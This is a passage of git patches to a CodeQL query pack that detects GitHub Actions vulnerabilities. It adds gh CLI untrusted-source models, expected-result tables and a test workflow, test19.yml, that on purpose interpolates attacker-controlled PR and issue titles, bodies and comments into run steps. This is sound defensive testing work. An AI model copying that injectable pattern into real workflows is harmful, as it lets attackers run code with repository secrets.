.github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:7:3:7:19 | workflow_dispatch | .github/workflows/test10.yml | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml | +| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml | +| .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | .github/workflows/test17.yml | +| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | .github/workflows/untrusted_checkout3.yml | +| .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | +| .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 1d6122b37479..13e16280c33d 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -1,3 +1,7 @@ +| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index 29237c9a544e..c81666f72dc2 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -4,10 +4,6 @@ | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 54338f4f35274436b2a76f44c4479ec435da070d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 22 Oct 2024 11:19:48 +0200 Subject: [PATCH 606/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index c908efa68f7e..867f1bfdb862 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.70 +version: 0.1.71 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index d2c2e26c361a..df650d0e242e 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.70 +version: 0.1.71 groups: [actions, queries] suites: codeql-suites extractor: javascript From 02c5f74f2059dff88cc6f02655151e0728c28000 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 22 Oct 2024 14:57:59 +0200 Subject: [PATCH 607/707] New gh CLI sources --- ql/lib/codeql/actions/config/Config.qll | 14 ++- .../actions/config/ConfigExtensions.qll | 7 +- .../codeql/actions/dataflow/FlowSources.qll | 30 ++++- .../security/OutputClobberingQuery.qll | 2 +- ql/lib/ext/config/untrusted_gh_command.yml | 56 +++++++++ ...commands.yml => untrusted_git_command.yml} | 2 +- .../CWE-094/.github/workflows/test19.yml | 112 ++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 108 +++++++++++++++++ .../CWE-094/CodeInjectionMedium.expected | 90 ++++++++++++++ 9 files changed, 412 insertions(+), 9 deletions(-) create mode 100644 ql/lib/ext/config/untrusted_gh_command.yml rename ql/lib/ext/config/{untrusted_git_commands.yml => untrusted_git_command.yml} (96%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index 82b7a53a9d7b..4dbdcbf5528d 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -125,6 +125,16 @@ predicate vulnerableActionsDataModel( * - cmd_regex: Regular expression for matching untrusted git commands * - flag: Flag for the command */ -predicate untrustedGitCommandsDataModel(string cmd_regex, string flag) { - Extensions::untrustedGitCommandsDataModel(cmd_regex, flag) +predicate untrustedGitCommandDataModel(string cmd_regex, string flag) { + Extensions::untrustedGitCommandDataModel(cmd_regex, flag) +} + +/** + * MaD models for untrusted gh commands + * Fields: + * - cmd_regex: Regular expression for matching untrusted gh commands + * - flag: Flag for the command + */ +predicate untrustedGhCommandDataModel(string cmd_regex, string flag) { + Extensions::untrustedGhCommandDataModel(cmd_regex, flag) } diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll index a32e9c445f2d..ed575de0eb47 100644 --- a/ql/lib/codeql/actions/config/ConfigExtensions.qll +++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll @@ -61,4 +61,9 @@ extensible predicate vulnerableActionsDataModel( /** * Holds for git commands that may introduce untrusted data when called on an attacker controlled branch. */ -extensible predicate untrustedGitCommandsDataModel(string cmd_regex, string flag); +extensible predicate untrustedGitCommandDataModel(string cmd_regex, string flag); + +/** + * Holds for gh commands that may introduce untrusted data + */ +extensible predicate untrustedGhCommandDataModel(string cmd_regex, string flag); diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 91b110f87eee..56c901434ce0 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -80,7 +80,7 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { GitCommandSource() { exists(Step checkout, string cmd_regex | - // This shoould be: + // This should be: // source instanceof PRHeadCheckoutStep // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround @@ -105,8 +105,8 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { checkout.getAFollowingStep() = run and run.getScript().getAStmt() = cmd and cmd.indexOf("git") = 0 and - untrustedGitCommandsDataModel(cmd_regex, flag) and - cmd.regexpMatch(".*" + cmd_regex + ".*") + untrustedGitCommandDataModel(cmd_regex, flag) and + cmd.regexpMatch(cmd_regex + ".*") ) } @@ -117,6 +117,28 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { override Run getEnclosingRun() { result = run } } +class GhCLICommandSource extends RemoteFlowSource, CommandSource { + Run run; + string cmd; + string flag; + + GhCLICommandSource() { + exists(string cmd_regex | + this.asExpr() = run.getScript() and + run.getScript().getAStmt() = cmd and + cmd.indexOf("gh ") = 0 and + untrustedGhCommandDataModel(cmd_regex, flag) and + cmd.regexpMatch(cmd_regex + ".*") + ) + } + + override string getSourceType() { result = flag } + + override Run getEnclosingRun() { result = run } + + override string getCommand() { result = cmd } +} + class GitHubEventPathSource extends RemoteFlowSource, CommandSource { string cmd; string flag; @@ -206,7 +228,7 @@ class ArtifactSource extends RemoteFlowSource, FileSource { */ private class CheckoutSource extends RemoteFlowSource, FileSource { CheckoutSource() { - // This shoould be: + // This should be: // source instanceof PRHeadCheckoutStep // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 58b7b18ca62b..311c3abdb691 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -20,7 +20,7 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { ( step instanceof UntrustedArtifactDownloadStep or - // This shoould be: + // This should be: // artifact instanceof PRHeadCheckoutStep // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround diff --git a/ql/lib/ext/config/untrusted_gh_command.yml b/ql/lib/ext/config/untrusted_gh_command.yml new file mode 100644 index 000000000000..653f9e31c983 --- /dev/null +++ b/ql/lib/ext/config/untrusted_gh_command.yml @@ -0,0 +1,56 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: untrustedGhCommandDataModel + data: + # + # PULL REQUESTS + # + # HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName') + - ["gh\\s+pr\\b.*\\bview\\b.*\\.headRefName.*", "branch,oneline"] + # TITLE=$(gh pr view $PR_NUMBER --json title --jq .title) + - ["gh\\s+pr\\b.*\\bview\\b.*\\.title.*", "title,oneline"] + # BODY=$(gh pr view $PR_NUMBER --json body --jq .body) + - ["gh\\s+pr\\b.*\\bview\\b.*\\.body.*", "text,multiline"] + # COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')" + - ["gh\\s+pr\\b.*\\bview\\b.*\\.comments.*", "text,multiline"] + # CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')" + - ["gh\\s+pr\\b.*\\bview\\b.*\\.files.*", "filename,multiline"] + # AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') + - ["gh\\s+pr\\b.*\\bview\\b.*\\.author.*", "username,oneline"] + # + # ISSUES + # + # TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title') + - ["gh\\s+issue\\b.*\\bview\\b.*\\.title.*", "title,oneline"] + # BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body,assignees --jq .body) + - ["gh\\s+issue\\b.*\\bview\\b.*\\.body.*", "text,multiline"] + # COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body') + - ["gh\\s+issue\\b.*\\bview\\b.*\\.comments.*", "text,multiline"] + # + # API + # + # PR="$(gh api /repos/test/test/pulls/${PR_NUMBER})" + # + # HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' | head -n 1) + - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*\\b.*\\.head.ref.*", "branch,oneline"] + # TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title") + - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*\\b.*\\.title.*", "title,oneline"] + # BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body") + - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*\\b.*\\.body.*", "text,multiline"] + # COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') + - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*/comments\\b.*\\.body.*", "text,multiline"] + # CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename') + - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*/files\\b.*\\.filename.*", "filename,oneline"] + # AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login") + - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*\\b.*\\.user\\.login.*", "username,oneline"] + # + # ISSUES + # + # TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title") + - ["gh\\s+api\\b.*\\b(/)?repos/.*/issues.*\\b.*\\.title.*", "title,oneline"] + # BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body") + - ["gh\\s+api\\b.*\\b(/)?repos/.*/issues.*\\b.*\\.body.*", "text,multiline"] + # COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') + - ["gh\\s+api\\b.*\\b(/)?repos/.*/issues.*/comments\\b.*\\.body.*", "text,multiline"] + diff --git a/ql/lib/ext/config/untrusted_git_commands.yml b/ql/lib/ext/config/untrusted_git_command.yml similarity index 96% rename from ql/lib/ext/config/untrusted_git_commands.yml rename to ql/lib/ext/config/untrusted_git_command.yml index b4b96a4af43e..e862267027a9 100644 --- a/ql/lib/ext/config/untrusted_git_commands.yml +++ b/ql/lib/ext/config/untrusted_git_command.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: github/actions-all - extensible: untrustedGitCommandsDataModel + extensible: untrustedGitCommandDataModel data: # FILES=$(git diff-tree --no-commit-id --name-only HEAD -r) - ["git\\b.*\\bdiff-tree\\b", "filename,multiline"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml new file mode 100644 index 000000000000..804d55a7db28 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml @@ -0,0 +1,112 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + pulls1: + runs-on: ubuntu-latest + steps: + - id: head_ref + run: | + HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName') + echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.head_ref.outputs.head_ref}}" + - id: title + run: | + TITLE=$(gh pr view $PR_NUMBER --json title --jq .title) + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title}}" + - id: body + run: | + BODY=$(gh pr view $PR_NUMBER --json body --jq .body) + echo "body=$BODY" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.body.outputs.body}}" + - id: comments + run: | + COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')" + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.comments.outputs.comments}}" + - id: files + run: | + CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')" + echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.files.outputs.files}}" + - id: author + run: | + AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') + echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.author.outputs.author}}" + pulls2: + runs-on: ubuntu-latest + steps: + - id: head_ref + run: | + HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' | head -n 1) + echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.head_ref.outputs.head_ref}}" + - id: title + run: | + TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title") + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title}}" + - id: body + run: | + BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body") + echo "body=$BODY" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.body.outputs.body}}" + - id: comments + run: | + COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.comments.outputs.comments}}" + - id: files + run: | + CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename') + echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.files.outputs.files}}" + - id: author + run: | + AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login") + echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.author.outputs.author}}" + issues1: + runs-on: ubuntu-latest + steps: + - id: title + run: | + TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title') + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title}}" + - id: body + run: | + BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body') + echo "body=$BODY" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.body.outputs.body}}" + - id: comments + run: | + COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body') + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.comments.outputs.comments}}" + issues2: + runs-on: ubuntu-latest + steps: + - id: title + run: | + TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title") + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title}}" + - id: body + run: | + BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body") + echo "body=$BODY" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.body.outputs.body}}" + - id: comments + run: | + COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.comments.outputs.comments}}" + + + + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 83faf4eb5e44..8a134a6f7ef3 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -160,6 +160,42 @@ edges | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | provenance | | +| .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | provenance | | +| .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | provenance | | +| .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | provenance | | +| .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | provenance | | +| .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | provenance | | +| .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | provenance | | +| .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | provenance | | +| .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | provenance | | +| .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | provenance | | +| .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | provenance | | +| .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | provenance | | +| .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | provenance | | +| .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | 